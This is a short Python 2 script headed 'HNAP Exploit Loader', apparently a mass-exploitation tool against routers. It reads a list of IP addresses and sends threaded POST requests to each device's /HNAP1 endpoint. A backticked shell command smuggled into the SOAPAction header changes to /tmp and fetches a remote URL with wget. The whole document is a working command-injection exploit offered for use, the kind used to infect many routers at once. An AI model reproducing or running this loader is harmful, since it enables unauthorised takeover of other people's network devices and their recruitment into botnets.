(UPnP) HNAP Exploit Loader | By; LiGhT

1. #! python !#
2.  
3. # HNAP Exploit | by; LiGhT
4.  
5. import threading, sys, time, random, socket, re, os, requests
6.  
7. ips = open(sys.argv[1], "r").readlines()
8. payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
9. headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp && wget http://iplogger.co/2qWq45 -O-`'}
10.  
11. class pump(threading.Thread):
12.     def __init__ (self, ip):
13.         threading.Thread.__init__(self)
14.         self.ip = str(ip).rstrip('\n')
15.     def run(self):
16.         try:
17.             url = "http://"+ip+"/HNAP1"
18.             url = re.sub('\n', '', url)
19.             r = requests.post(url, timeout=5, headers=headerlist, data=payload)
20.             print "[HNAP] Payload Sent %s"%(url)
21.         except:
22.             pass
23.  
24. for ip in ips:
25.     try:
26.         n = pump(ip)
27.         n.start()
28.     except:
29.         pass